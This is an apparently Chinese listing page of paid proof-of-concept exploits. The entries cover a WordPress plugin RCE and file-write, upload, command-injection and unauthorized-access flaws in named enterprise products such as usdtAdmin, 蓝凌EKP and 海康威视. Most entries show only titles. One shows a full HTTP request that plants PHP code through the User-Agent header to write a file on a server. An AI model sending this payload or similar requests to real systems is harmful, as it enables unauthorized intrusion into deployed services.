POC_秃兔安全

更新

浏览

WordPress 自定义登录和注册小部件插件 RCE CVE-2025-49029

fofa语句官方yaml

# poc

dreamer2923个月前

0648

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...

付费阅读500 # poc

dreamer2922个月前

0937

【通用】微信活码系统 index 后台任意内容写入漏洞

fofa 语句poc再次访问 /data/auto.php 注需要登录后有权限才能进行修改

付费阅读500 # poc # yakit # nuclei

dreamer29211个月前

01168

【通用】服务配置工具平台 Download 任意文件读取漏洞 (安徽生命港湾信息技术有限公司)

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证

付费阅读500 # poc # yakit.nuclei

dreamer29211个月前

0876

蓝凌EKP存在sys_ui_component远程命令执行漏洞

2024你懂的

秃兔11个月前

09113

红海云eHR kgFile.mob 任意文件上传

2024你懂的

秃兔11个月前

01048

360天擎 – 未授权访问

2024你懂的

秃兔11个月前

07212

锐捷M18000-WS-ED无线控制器存在CRL命令注入

2024你懂的

秃兔11个月前

0838

九思-OA-任意文件上传

2024你懂的

秃兔11个月前

01007

海康威视综合安防管理平台前台远程命令执行

2024你懂的

秃兔11个月前

01115

上一页 1…38 394041 42…55 下一页跳转